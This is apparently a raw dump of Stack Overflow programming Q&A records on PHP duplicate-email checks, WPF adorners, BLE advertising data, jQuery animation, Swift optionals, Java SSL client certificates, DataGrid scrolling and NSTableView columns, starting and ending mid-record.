\n<code>$stmt = $conn->prepare(\"SELECT COUNT(1) FROM cust WHERE email = ?\");\n$stmt->bind_param(\"s\", $email);\n$stmt->execute();\n$emailExists = $stmt->get_result()->fetch_row()[0];\nif ($emailExists) {\n echo \"This email address is already in use\";\n} else {\n \/\/ continue with insert code\n}\n<\/code>\nThis approach does not require you to close the statement. Once you execute <code>get_result<\/code> the statement data is fetched in full.\nThis solution also has a potential performance benefit. If your table contains many columns with many data, then fetching that data just to check if a record exists is a waste of CPU. Simply fetch <code>COUNT(1)<\/code> and check the single column of the single returned record. If it is 0, the value is falsish, if it is more than your <code>if<\/code> statement will evaluate to true and a message will be displayed. 
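If the count comes back as 0 the address is free, so the else branch can simply reuse the prepared INSERT from the question. A sketch, assuming $conn, $email and $hashPw are set up exactly as in the original code:\n<code>if ($emailExists) {\n    echo \"This email address is already in use\";\n} else {\n    $stmt = $conn->prepare(\"INSERT INTO cust (email, pw) VALUES (?, ?)\");\n    $stmt->bind_param(\"ss\", $email, $hashPw);\n    $stmt->execute();\n    echo \"Success\";\n}\n<\/code>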
I would also strongly recommend to structure your code in such a way that you rarely have to use <code>exit<\/code>.\nAnswer: To check if the email already exists in the database, just try to select a row with it in:\n<code>$stmt = $conn->prepare(\"SELECT * FROM cust WHERE email = ?\");\n$stmt->bind_param(\"s\", $email);\n$stmt->execute();\n$stmt->store_result();\nif ($stmt->num_rows > 0) {\n echo \"This email address is already in use\";\n exit;\n}\n$stmt->close();\n\/\/ continue with insert code\n<\/code>\nIn terms of your other questions, I don't see any reason to unset variables, and using prepared queries and <code>password_hash<\/code> gives you about as good protection as you can get.\nComment: @Justin299 sorry, forgot the call to close which you need before preparing another statement. See my edit.\nComment: so now it is correct. however the use of num_rows is still superfluous\nComment: It more an opinion, but this function is useless and doesn't exist in other drivers. I would rather fetch the data selected. it will make calling close() unnecessary.\nComment: @Justin299 did you see my comment about `store_result` and my edit?\nComment: Thanks for this ! I tried to add this but it gives me the following error - do I have to do something like \"unbind\" before I can bind the insert parameters (it seems the error is with that part): \"Fatal error: Uncaught Error: Call to a member function bind_param() on bool in...\"\nComment: @YourCommonSense: Thanks. Can you say what is wrong or missing here ?\nComment: @Justin299 I forgot the call to store_result\nComment: @YourCommonSense why is num_rows superfluous?\nComment: @Nick: Can you say why it is ignoring the count ? I am confused now and not sure what else to change.\nComment: @YourCommonSense fair point. I guess it's 6 of one half a dozen of the other. If you fetch the data you then have to compare the result of whichever `fetch` you use.\nComment: @Justin299 good to hear. I apologise for wasting your time earlier with the bits I left out.\nComment: @Nick: No problem at all - happy it works in the end.\n","meta":{"source":"stackoverflow","title":"PHP: Insert into MySQL database and check if already existing - with binding parameters","dup_signals":{}},"subset":"stackexchange"} +{"text":"Adorner not showing up\n\nQuestion: I am using an UserControl that contains the Canvas. As child of the canvas there is content control with adorner. Why the adorner is not visible perhaps the adorner layer is ceated.\nEverything is created and attached. The adorner layer is very high in a visual tree.\nThe adorner layer is placed outside the UserControl.\nI know that is created because I implemented basic movement mechanism that works but the decorator never shows up.\nWhat has to be done to show the decorator?\nComment: As far as I see from \nhttp:\/\/msdn.microsoft.com\/en-us\/library\/ms743737.aspx the Adorner is usually implemented inside the method override OnRender.\nIs this what your are doing?\nComment: Yes I am. I finally found why. When I added the merged resource dictionary to the MainWindow of the application and not only into resources of the custom usercontrol then the adorner finally show up.\nComment: @patrik i am facing same issue , please explain more...\nComment: I do not know what is you application architecture but I managed to move my entire resource dictionary to the window that contains all object and adorners I managed to resolve the visibility. Previously I had the resources of the adorner assigned to the UserControl. 
When I moved everything to upper layers (the Window) I got the adorner on the screen.\nAnswer: A WPF window by default has an AdornerDecorator but a usercontrol does not. So you just have to wrap your Canvas with an Adorner decorator in your usercontrol.xaml:\n<code><AdornerDecorator ClipToBounds=\"True\">\n <Canvas x:Name=\"DesignerCanvas\"\n ClipToBounds=\"True\"\n SnapsToDevicePixels=\"True\"\/>\n<\/AdornerDecorator>\n<\/code>\nMore info: https:\/\/social.msdn.microsoft.com\/Forums\/vstudio\/en-US\/43a2565d-df21-4cf3-aa2a-240d67662945\/please-help-me-resolve-a-mistery-with-resource-adorner-and-usercontrol-a-bug?forum=wpf\n","meta":{"source":"stackoverflow","title":"Adorner not showing up","dup_signals":{}},"subset":"stackexchange"} +{"text":"Read manufacture data of ble packet with javascript\n\nQuestion: I am working on a React-native ble project that now requires a Broadcaster (device) observer (client) relationship. \nIs there a high level (JavaScript) way of reading the advertisement packet of ble to obtain the byte array? I am trying to read the entire advertisement packet rather than any format.\nI have use react-native-ble-manager and am looking at react-native-ble-plx by Polidea:\nhttps:\/\/polidea.github.io\/react-native-ble-plx\/#devicemanufacturerdata\nIt looks as if specific fields of the advertisement packet are available under Device: such as manufacture data (the thing I am most interested in and manipulating on the embedded side). However, Most of Polidea examples obtain the Device from a connection.\nI may be misinterpreting the documentation? Could use some advice\/ direction to any further references.\nAnswer: Was misunderstanding the documentation..\n2 minutes of stripping down some complexity revealed what I needed to know.\nAnswer provided for reference of others:\nBleManager's startDeviceScan function(UUIDS, options, listener) where listener is the function where second argument is returned device object. Access its fields from there.\n<code>this.manager.startDeviceScan(null, null, (error, device) => {\n if (error) {\n console.log(error.message);\n return;\n }\n if(device.name === \"Some_encoding_Sensor_1\"){\n console.log(device.manufacturerData);\n }\n<\/code>\nExample shown should filter based off of UUID rather than device.name but that may be easier to work with initially\/dynamically (having multiple devices with renaming scheme).\nAnswer: Take a look on this JS library:\nadvlib\nIt helps with advertising packet decoding and currently supports the following protocols:\n\nBluetooth Low Energy (BLE)\nreelyActive RFID\n","meta":{"source":"stackoverflow","title":"Read manufacture data of ble packet with javascript","dup_signals":{}},"subset":"stackexchange"} +{"text":"jQuery expand element from center not working\n\nQuestion: I am trying to make a zoom-like effect on hover event in a gallery exercise. What I need is for an image to seem to expand from its center, not down and right. If I understood correctly, I need to move it half way left and up for this to work. 
Also, I'm using <code>em<\/code>, so I try to convert <code>em<\/code> to pixels here.\nRelevant html:\n<code><div id=\"gallery\">\n <img src=\"img\/cool1.gif\">\n <img src=\"img\/cool2.gif\" id=\"gal2\">\n <img src=\"img\/cool3.gif\" id=\"gal3\">\n<\/div>\n<\/code>\nCSS:\n<code>#gallery {\n width: 31em;\n margin-left: auto;\n margin-right: auto;\n}\n\n#gallery img {\n width: 10em;\n height: auto;\n position: absolute;\n}\n\n#gal2 {\n margin-left: 10em;\n}\n\n#gal3 {\n margin-left: 20em;\n}\n<\/code>\nFinally, jQuery:\n<code>var fontSize = $(\"#gallery img\").css(\"font-size\");\/\/equal to 1em?\nvar fontInt = parseInt(fontSize);\n \nvar t = $(\"#gallery img\").position().top;\nvar tNew = t - (5 * fontInt);\/\/top position\n \nvar l = $(\"#gallery img\").position().left;\nvar lNew = l - (5 * fontInt);\/\/left position\n\n$(\"#gallery img\").hover(\n function() {\n \n $(this).stop().css(\"zIndex\", \"1\").animate({\n height : \"20em\",\n width : \"20em\",\n top : tNew,\n left : lNew\n \n }, 400);\n }, \/\/end mouseover\n function() {\n $(this).stop().animate({\n height : \"10em\",\n width : \"10em\",\n top : t,\n left : l,\n zIndex : \"0\"\n }, 400);\n } \/\/end mouseout\n);\/\/end hover\n<\/code>\nedit 1 Images expand and change position, but not as expected. Also, they don't return on mouseout. Thanks to Racil Hilan for solving em-px conversion problem!\nedit 2 Problem moslty solved by fixing variable scope \u2013 position values moved before hover() function. The only remaining bug is that the pictures escape to the top right corner of the body before returning to their place on first interaction. Afterwards, it runs as expected. Also, could somebody explain why this works when the fontInt variable is multiplied by five, not by 10?\nedit 3 \u2013 solution As Mauricio Santamaria said below, just add the css() function setting top and left parameters before hover on #gallery img element like so:\n<code>$(\"#gallery img\").css({\"top\" : t, \"left\" : l}).hover(...);\n<\/code>\nThe rest stays the same.\nI improvised a fiddle for this, too: http:\/\/jsfiddle.net\/dzenesiz\/wudw5hmu\/15\/\nAnswer: The problem is that the <code>$(this).css(\"font-size\");<\/code> returns the size with the unit (e.g. 16px) which is not a number and the calculation results in a <code>NaN<\/code>.\nA quick solution is to parse it to an integer like this:\n<code>var fontSize = parseInt($(this).css(\"font-size\")); \/\/equal to 1em?\n<\/code>\nComment: So I should... parse it somehow? Thank you for your help.\nAnswer: to remove the \"jump\" when first interaction you should set \"top\" and \"left\" on your css, this removes that behavior (tested on your fiddle with 8px or 0.4em equivalent to your initial image size), and for your question about why 5 gets your desired result its that the result of that operation (5 * fontInt) gives you the initial value of images ie. 100px (10em), and that's the amount for top and left that you need to make it zoom from center. (the initial value for fontSize is 20em, initial t =8, so 8-100 = -92, the right value taking in account the margin )\n","meta":{"source":"stackoverflow","title":"jQuery expand element from center not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"Swift 2 Crash optionals\n\nQuestion: I have updated my app to Xcode 7 and converted to swift2 I have cleared all the errors but now when running the app it crashes just after seeing the launch screen. 
from below code this line is highlighted in green (thread 1 : breakpoint 1.4):\n<code>var cellNumber:Int! = 1\n<\/code>\nI really don't know what is causing an issue. Its my first app please please excuse me for odd ways of coding:\nViewOne.swift\n<code>import Foundation\nimport UIKit\n\n class ViewOne : UITableViewController {\n\n override internal func viewDidLoad() {\n super.viewDidLoad()\n\n }\n\n var cellNumber:Int! = 1\n \/\/var cellNumber = 1\n\n @IBAction func Cell2Pressed(sender: UIButton) {\n cellNumber = 2\n }\n\n @IBAction func Cell3Pressed(sender: UIButton) {\n cellNumber = 3\n }\n\n @IBAction func Cell4Pressed(sender: UIButton) {\n cellNumber = 4\n }\n\n @IBAction func Cell5Pressed(sender: UIButton) {\n cellNumber = 5\n }\n\n @IBAction func Cell6Pressed(sender: UIButton) {\n cellNumber = 6\n }\n\n @IBAction func Cell7Pressed(sender: UIButton) {\n cellNumber = 7\n }\n\n @IBAction func Cell8Pressed(sender: UIButton) {\n cellNumber = 8\n }\n\n @IBAction func Cell9Pressed(sender: UIButton) {\n cellNumber = 9\n }\n\n override internal func didReceiveMemoryWarning() {\n super.didReceiveMemoryWarning()\n }\n\n `\/\/ @IBOutlet weak var Cell1Pressed: UITableViewCell!` \n\n override internal func prepareForSegue(segue: UIStoryboardSegue, sender: AnyObject?) {\n let DestViewControler : ViewController = segue.destinationViewController as! ViewController\n \/\/ var Dest2ViewControler : RadioPlayer = segue.destinationViewController as! RadioPlayer\n\n DestViewControler.trackNumber = cellNumber!\n \/\/ Dest2ViewControler.trackNumber = cellNumber\n\n }\n\n }\n<\/code>\nViewControler.swift\n<code> `import UIKit`\n`import AVFoundation`\n`import MediaPlayer`\n\n`class ViewController: UIViewController {`\n\n override func canBecomeFirstResponder() -> Bool {\n return true\n }\n\n static let sharedInstance = ViewController()\n @IBOutlet var PausePlay: UIButton!\n\n var ButtonAudioPlayer = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"ButtonAudio\", ofType: \"wav\")!))\n\n private var BackgroundAudio1 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio2 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio3 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio4 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio5 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio6 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio7 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio8 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio9 = try? 
AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n\n var trackNumber = Int()\n\n override func viewDidLoad() {\n super.viewDidLoad()\n \/\/ Do any additional setup after loading the view, typically from a nib.\n\n play()\n\n \/\/in info.playlist you need to add 'Required background modes and add to idem 0 ap plays audio airplay then below code to play even when iphone is locked: -marcin\n \/*\n PausePlay.setTitle(\"Play\", forState: UIControlState.Normal)\n\n do {\n try AVAudioSession.sharedInstance().setCategory(AVAudioSessionCategoryPlayback)\n } catch _ {\n }\n\n \/\/ Do any additional setup after loading the view, typically from a nib.\n PausePlay.setTitle(\"Play\", forState: UIControlState.Normal)\n if NSClassFromString(\"MPNowPlayingInfoCenter\") != nil {\n let image:UIImage = UIImage(named: \"logo_player_background\")!\n let albumArt = MPMediaItemArtwork(image: image)\n let songInfo: NSMutableDictionary = [\n MPMediaItemPropertyTitle: \"WIND\",\n MPMediaItemPropertyArtist: \"DEEP BASE\",\n MPMediaItemPropertyArtwork: albumArt\n ]\n MPNowPlayingInfoCenter.defaultCenter().nowPlayingInfo = songInfo as [NSObject : AnyObject]\n \/\/MPNowPlayingInfoCenter.defaultCenter().nowPlayingInfo = songInfo\n }\n if (AVAudioSession.sharedInstance().setCategory(AVAudioSessionCategoryPlayback)) {\n print(\"Receiving remote control events\")\n UIApplication.sharedApplication().beginReceivingRemoteControlEvents()\n } else {\n print(\"Audio Session error.\")\n }\n\n*\/\n\n}\n override func didReceiveMemoryWarning() {\n super.didReceiveMemoryWarning()\n \/\/ Dispose of any resources that can be recreated.\n }\n\n @IBAction func PlayAudio1(sender: AnyObject) {\n ButtonAudioPlayer!.play()\n\n }\n @IBAction func Stop(sender: AnyObject) {\n\n stop()\n\n \/\/BackgroundAudio1.stop()\n \/\/BackgroundAudio1.currentTime = 0\n\n \/\/PausePlay.setTitle(\"Play\", forState: UIControlState.Normal)\n\n }\n\n @IBAction func Restart(sender: AnyObject) {\n\n BackgroundAudio1!.stop()\n BackgroundAudio1!.currentTime = 0\n BackgroundAudio1!.play()\n\n }\n\n @IBAction func PausePlay(sender: AnyObject) {\n\n \/*\n if (BackgroundAudio.playing == true){\n BackgroundAudio.stop()\n PausePlay.setTitle(\"Play\", forState: UIControlState.Normal)\n\n }\n else{\n\n BackgroundAudio.play()\n PausePlay.setTitle(\"Pause\", forState: UIControlState.Normal)\n }\n *\/\n\n toggle()\n\n }\n\n private var isPlaying = false\n\n func play() {\n\n if(trackNumber == 2){\n BackgroundAudio2!.play()}\n if(trackNumber == 3){\n BackgroundAudio3!.play()}\n if(trackNumber == 4){\n BackgroundAudio4!.play()}\n if(trackNumber == 5){\n BackgroundAudio5!.play()}\n if(trackNumber == 6){\n BackgroundAudio6!.play()}\n if(trackNumber == 7){\n BackgroundAudio7!.play()}\n if(trackNumber == 8){\n BackgroundAudio8!.play()}\n if(trackNumber == 9){\n BackgroundAudio9!.play()}\n\n isPlaying = true\n }\n\n func pause() {\n if(trackNumber == 2){\n BackgroundAudio2!.pause()}\n if(trackNumber == 3){\n BackgroundAudio3!.pause()}\n if(trackNumber == 4){\n BackgroundAudio4!.pause()}\n if(trackNumber == 5){\n BackgroundAudio5!.pause()}\n if(trackNumber == 6){\n BackgroundAudio6!.pause()}\n if(trackNumber == 7){\n BackgroundAudio7!.pause()}\n if(trackNumber == 8){\n BackgroundAudio8!.pause()}\n if(trackNumber == 9){\n BackgroundAudio9!.pause()}\n\n isPlaying = false\n }\n\n func pause2() {\n\n BackgroundAudio2!.pause()\n\n BackgroundAudio3!.pause()\n\n BackgroundAudio4!.pause()\n\n BackgroundAudio5!.pause()\n\n 
BackgroundAudio6!.pause()\n\n BackgroundAudio7!.pause()\n\n BackgroundAudio8!.pause()\n\n BackgroundAudio9!.pause()\n\n isPlaying = false\n }\n\n \/\/dodana przezemnie:\n func stop() {\n if(trackNumber == 2){\n BackgroundAudio2!.stop()}\n if(trackNumber == 3){\n BackgroundAudio3!.stop()}\n if(trackNumber == 4){\n BackgroundAudio4!.stop()}\n if(trackNumber == 5){\n BackgroundAudio5!.stop()}\n if(trackNumber == 6){\n BackgroundAudio6!.stop()}\n if(trackNumber == 7){\n BackgroundAudio7!.stop()}\n if(trackNumber == 8){\n BackgroundAudio8!.stop()}\n if(trackNumber == 9){\n BackgroundAudio9!.stop()}\n\n isPlaying = false\n }\n\n func toggle() {\n if isPlaying == true {\n pause()\n } else {\n play()\n }\n }\n\n func currentlyPlaying() -> Bool {\n return isPlaying\n }\n\n override func remoteControlReceivedWithEvent(event: UIEvent?) {\n if event!.type == UIEventType.RemoteControl {\n if event!.subtype == UIEventSubtype.RemoteControlPlay {\n print(\"received remote play\")\n play() \/\/ these are producing terrible error\n } else if event!.subtype == UIEventSubtype.RemoteControlPause {\n print(\"received remote pause\")\n pause2() \/\/ these are producing terrible error\n } else if event!.subtype == UIEventSubtype.RemoteControlTogglePlayPause {\n print(\"received toggle\")\n ViewController.sharedInstance.toggle()\n }\n }\n }\n\n}\n<\/code>\nComment: possible duplicate of [Error \"Thread 1: breakpoint 2.1\"](http:\/\/stackoverflow.com\/questions\/32038226\/error-thread-1-breakpoint-2-1)\nAnswer: Right off the bat, I think you should say:\n<code>var cellNumber: Int? = 1\n<\/code>\nThe expression <code>Int!<\/code> unwraps an optional variable, but you would use <code>Int?<\/code> to declare an optional variable.\n","meta":{"source":"stackoverflow","title":"Swift 2 Crash optionals","dup_signals":{}},"subset":"stackexchange"} +{"text":"SSL Socket Connection Error\n\nQuestion: I am using JAVA 8. 
I am trying to connect a Socket Server using client certificates and certificate tree.\nI have followings provided by client:\n\nClient CERT (PEM)\nPrivate Key (PEM)\nCA Tree (PEM) - with 4 Certificates\n\nI have created keystore.jks using following steps:\n\nCombining client cert and CA tree in a single pem file using cat\nCrested PKCS12 file from combined file encrypted using private key(OpenSSL Command)\nGenerated JKS keystore file using keytool\n\nI have created trustore.jks using following steps:\n\nSplit CA Tree (4 certificates) into 4 different files\nGenerated trustore file using keytool by importing each file one by one\n\nMy Sample code is as following :\n<code> package com.tutorial.exception.customize;\n\nimport javax.net.ssl.SSLHandshakeException;\nimport javax.net.ssl.SSLSocket;\nimport javax.net.ssl.SSLSocketFactory;\nimport java.io.*;\nimport java.security.cert.CertPathValidatorException;\nimport java.security.cert.CertificateException;\nimport java.util.Scanner;\n\n\/**\n * Created by SomnathG on 12\/1\/2016.\n *\/\npublic class Client {\n public Client() {\n\n System.setProperty(\"javax.net.ssl.keyStore\", {keystore Location});\n System.setProperty(\"javax.net.ssl.keyStorePassword\", {password});\n System.setProperty(\"javax.net.ssl.trustStore\", {trustore location});\n System.setProperty(\"javax.net.ssl.trustStorePassword\", {password});\n System.setProperty(\"javax.net.debug\", \"all\");\n\n System.setProperty( \"sun.security.ssl.allowUnsafeRenegotiation\", \"true\" );\n }\n\n public void connectHost(){\n SSLSocketFactory sslSocketFactory = (SSLSocketFactory) SSLSocketFactory.getDefault();\n SSLSocket sslSocket = null;\n try {\n\n sslSocket = (SSLSocket) sslSocketFactory.createSocket(host, port);\n sslSocket.setEnabledProtocols(new String[] {\"TLSv1.2\"});\n\n sslSocket.startHandshake();\n\n InputStream inputStream = sslSocket.getInputStream();\n OutputStream outputStream = sslSocket.getOutputStream();\n System.out.println(\"Sending request to Socket Server\");\n outputStream.write(\"Hello\".getBytes());\n outputStream.write(\"exit\".getBytes());\n byte[] messageByte = new byte[1000];\n boolean end = false;\n String dataString = \"\";\n int bytesRead = 0;\n String messageString = \"\";\n DataInputStream in = new DataInputStream(sslSocket.getInputStream());\n\n while(!end)\n {\n bytesRead = in.read(messageByte);\n messageString += new String(messageByte, 0, bytesRead);\n if (messageString.length() == 100)\n {\n end = true;\n }\n }\n System.out.println(\"MESSAGE: \" + messageString);\n \/\/ byte[] read = (byte[]) ois.readObject();\n \/\/String s2 = new String(read);\n \/\/System.out.println(\"\" + s2);\n \/\/System.out.println(\"Message: \" + message);\n \/\/close resources\n\n \/\/System.out.println(receive(inputStream));\n\n }catch (IOException e) {\n e.printStackTrace();\n System.out.println(\"=====\");\n System.out.println(e.getMessage());\n System.out.println(\"=====\");\n CertPathValidatorException ce = new CertPathValidatorException(e);\n System.out.println(\"******\");\n System.out.println(ce.getIndex());\n System.out.println(ce.getReason());\n System.out.println(\"******\");\n \/\/e.printStackTrace();\n }\n\n }\n\n public static void main(String[] args){\n new Client().connectHost();\n }\n}\n<\/code>\nI am getting following exception after executing the code:\n<code> javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path validation failed: java.security.cert.CertPathValidatorException: basic constraints check failed: this is not 
a CA certificate\nat sun.security.ssl.Alerts.getSSLException(Alerts.java:192)\nat sun.security.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1949)\nat sun.security.ssl.Handshaker.fatalSE(Handshaker.java:302)\nat sun.security.ssl.Handshaker.fatalSE(Handshaker.java:296)\nat sun.security.ssl.ClientHandshaker.serverCertificate(ClientHandshaker.java:1509)\nat sun.security.ssl.ClientHandshaker.processMessage(ClientHandshaker.java:216)\nat sun.security.ssl.Handshaker.processLoop(Handshaker.java:979)\nat sun.security.ssl.Handshaker.process_record(Handshaker.java:914)\nat sun.security.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:1062)\nat sun.security.ssl.SSLSocketImpl.performInitialHandshake(SSLSocketImpl.java:1375)\nat sun.security.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.java:1403)\nat sun.security.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.java:1387)\nat com.tutorial.exception.customize.Client.connectHost(Client.java:33)\nat com.tutorial.exception.customize.Client.main(Client.java:82)\nat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\nat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\nat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\nat java.lang.reflect.Method.invoke(Method.java:498)\nat com.intellij.rt.execution.application.AppMain.main(AppMain.java:147)\n<\/code>\nAfter analyzing the log I have found \"clientHello\" and \"serverHello\" messages but after that application is throwing above mentioned exception.\nWhat am I doing wrong? Please advice.\nThanks,\nSomnath Guha\nComment: `CertPathValidatorException: basic constraints check failed: this is not a CA certificate` sounds like you have the CA certs in the wrong place or swapped with some other certificate.\nComment: I am creating truststore jks using CA Certs. Do I need to add client cert also in trustore file?\nAnswer: I have figured out the issue after analyzing the debug lo.\n\"BasicConstraints\" was missing from the server V3 certificates and thus java was failing to recognize the certificate as a valid certificate. Once that constraint has been added then the client was able to handshake with the server and able to communicate with server.\nBasicConstraints:[\n CA:true\n PathLen:2147483647\n]\n","meta":{"source":"stackoverflow","title":"SSL Socket Connection Error","dup_signals":{}},"subset":"stackexchange"} +{"text":"Move vertical scrollbar up anytime datagrid is refreshed\n\nQuestion: Hello Everybody I am new in C#. I have a some data that in load in my datagrid but anytime the datagrid has new items loaded my vertical scroll bar stays in the same position!\nHow to move up my scroll bar anytime the datagrid has new values or I click to a new button\nmove vertical scrollabar up anytime the datagrid is refresh\nComment: Welcome to SO. First lesson: C# is not C.\nComment: Okay so any idea about my question? 
please @Gerhardh\nComment: No, but if you add wrong language tag, the wrong people will look into your question who might not know much about C# (like me)\nAnswer: The DataGrid class has a method <code>ScrollIntoView<\/code> which can be used to scroll a specific item into the visible area of the datagrid.\nFor example, to scroll to the first item of the datagrid:\n<code>datagrid.ScrollIntoView(datagrid.Items[0]);\n<\/code>\n","meta":{"source":"stackoverflow","title":"Move vertical scrollbar up anytime datagrid is refreshed","dup_signals":{}},"subset":"stackexchange"} +{"text":"Columns added programmatically to NSTableView not recognised in Delegate\n\nQuestion: I may be lost in a glass of water but I can't seem to be able to add columns to a NSTableView that are then recognised in the NSTableViewDelegate. I create a table in IB with one column and give the column a string identifier. The I add the other columns in the View Controller:\n<code> override func viewDidLoad() {\n super.viewDidLoad()\n\n for columnIndex in 0..<blotter!.singleOutput[0].parameter.count {\n\n let tmpParam = blotter!.singleOutput[0].parameter[columnIndex]\n let column = NSTableColumn(identifier: NSUserInterfaceItemIdentifier(rawValue: tmpParam.columnID))\n column.title = tmpParam.label\n column.width = CGFloat(80)\n column.minWidth = CGFloat(40)\n column.maxWidth = CGFloat(120)\n blotterOutputTable.addTableColumn(column)\n\n }\n\n blotterOutputTable.delegate = self\n blotterOutputTable.dataSource = self\n blotterOutputTable.target = self\n\n blotterOutputTable.reloadData()\n\n }\n<\/code>\nThe NSTableViewDataSource returns the correct number of rows. The problem I have is in the NSTableViewDelegate:\n<code>extension OutputsViewController: NSTableViewDelegate {\n\n func tableView(_ tableView: NSTableView, viewFor tableColumn: NSTableColumn?, row: Int) -> NSView? {\n\n var text: String = \"\"\n var cellIdentifier: String = \"\"\n\n guard let item = blotter?.singleOutput[row] else { return nil }\n\n \/\/ 1. LABELS COLUMN\n \/\/ ================\n\n if tableColumn?.identifier.rawValue == \"dealColumn\" {\n\n let myParameter = item.parameter.index(where: {$0.columnID == \"BBTickColumn\"})\n\n text = item.parameter[myParameter!].value as! String \n cellIdentifier = \"dealColumn\"\n\n if let cell = tableView.makeView(withIdentifier: NSUserInterfaceItemIdentifier(rawValue: cellIdentifier), owner: nil) as? NSTableCellView {\n\n cell.textField?.stringValue = text \n return cell\n }\n\n else { return nil }\n\n } \/\/ END OF LABLES COLUMN (FIRST ONE)\n\n else { \/\/ THIS IS WHERE THE PROBLEM IS\n\n let myParameter = item.parameter.index(where: {$0.columnID == tableColumn?.identifier.rawValue } )\n let (_, valueAsText) = item.parameter[myParameter!].interfaceItems()\n text = valueAsText\n\n cellIdentifier = item.parameter[myParameter!].columnID\n\n if let cell = tableView.makeView(withIdentifier: NSUserInterfaceItemIdentifier(rawValue: cellIdentifier), owner: nil) as? NSTableCellView {\n\n cell.textField?.stringValue = text\n return cell\n }\n\n else { return nil } \/\/ DEBUGGER PARAMETER ARE FROM HERE\n\n } \n }\n\n}\n<\/code>\nThe first column is the one I created in IB with its identifier. That works. The problem I have is in the else statement (which does not check for a column identifier). Below are the parameters as I see them in the debugger window when I stop the program after the cell creation failed \n<code>tableView NSTableView 0x000000010ebf9df0\ntableColumn NSTableColumn? 
0x0000600000895770\nrow Int 0\nself DataBaseManager.OutputsViewController 0x0000600000102b50\ntext String \"FLAT\" \ncellIdentifier String \"directionColumn\" \nitem DataBaseManager.BlotterOutputs 0x000060000002c240\nmyParameter Array.Index? 0\nvalueAsText String \"FLAT\" \ncell (null) (null) (null)\ntableColumn NSTableColumn? 0x0000600000895770\ntableColumn?.identifier NSUserInterfaceItemIdentifier? some\n_rawValue _NSContiguousString \"directionColumn\" 0x000060000104d200\nSwift._SwiftNativeNSString _SwiftNativeNSString \n_core _StringCore \n<\/code>\nYou can see that cellIdentifier and the tableColumn?.identifier.rawvalue are the same string (as it should be). I cannot understand then why the cell is not created. Any help is mostly welcome and let me know if this is not clear. Thanks\nComment: Does the tableview in the Storyboard\/XIB contain a cell view with id \"directionColumn\"?\nComment: Than you for your reply Willeke. The answer is no. Only the first column is in IB (\"dealColumn\"). All the other columns are added in viewDidLoad(). Their identifiers are in a class (parameter) which has a columnID property. It is the one that is used as the identifier for the newly created column. The debugger shows directionColumn because that is the first column that is created (and therefore where I stop the program to debug). I have about 50 columns to create, hence why I do not want to put them all in IB but add them programmatically.\nComment: Possible duplicate of [How to add columns in Cocoa NSTableView?](https:\/\/stackoverflow.com\/questions\/35585562\/how-to-add-columns-in-cocoa-nstableview)\nComment: I have looked at it and can't seem to make it working. Specifically I have modified viewDidLoad() to include the nib lines:\nComment: But on the line let myCellViewNib = blotterOutputTable.registeredNibsByIdentifier![\"dealColumn\"] get an error message: Cannot subscript a value of type '[NSUserInterfaceItemIdentifier : NSNib]' with an index of type 'String'. Apologies if this is trivial, but I am not a professional developer and I don't have a lot of experienced. Thank you\nComment: I looked into it and adjusted the syntax and now everything works. Thank you again\nAnswer: must register nibs identifiers as in this code:\n<code>import Cocoa\n\nclass MultiColumnTable: NSViewController, NSTableViewDataSource, NSTableViewDelegate {\n\n var list = [[String]](), header=[String]()\n var tableView : NSTableView? 
= nil\n var nColumns : Int = 0\n\n func genID(col : Int) -> NSUserInterfaceItemIdentifier { \/\/ generate column ID\n return NSUserInterfaceItemIdentifier(rawValue: String(format: \"Col%d\", col))\n }\n\n func setContent(header: [String], list : [[String]]) {\n self.header = header\n self.list = list\n self.nColumns = list[0].count\n\n if tableView != nil {\n tableView?.reloadData()\n }\n }\n\n func numberOfRows(in tableView: NSTableView) -> Int {\n\n func createColumns() {\n func addColumn(col:Int, header:String) {\n let tableColumn = NSTableColumn(identifier: genID(col: col))\n tableColumn.headerCell.title = header\n self.tableView!.addTableColumn(tableColumn)\n }\n\n \/\/ create columns and register them in NIB\n \/\/ IB: tableColumn[0] identifier ( NSTableColumn to \"Col0\" )\n\n if let myCellViewNib = tableView.registeredNibsByIdentifier![NSUserInterfaceItemIdentifier(rawValue: \"Col0\")] {\n\n for col in 0..<nColumns { \/\/ table should have 1 col in IB w\/Ident 'Col0'\n addColumn(col: col, header: header[col])\n tableView.register(myCellViewNib, forIdentifier: genID(col: col)) \/\/ register the above Nib for the newly added tableColumn\n }\n tableView.removeTableColumn(tableView.tableColumns[0]) \/\/ remove the original Col0\n }\n }\n\n self.tableView = tableView\n createColumns()\n\n return list.count\n }\n\n func 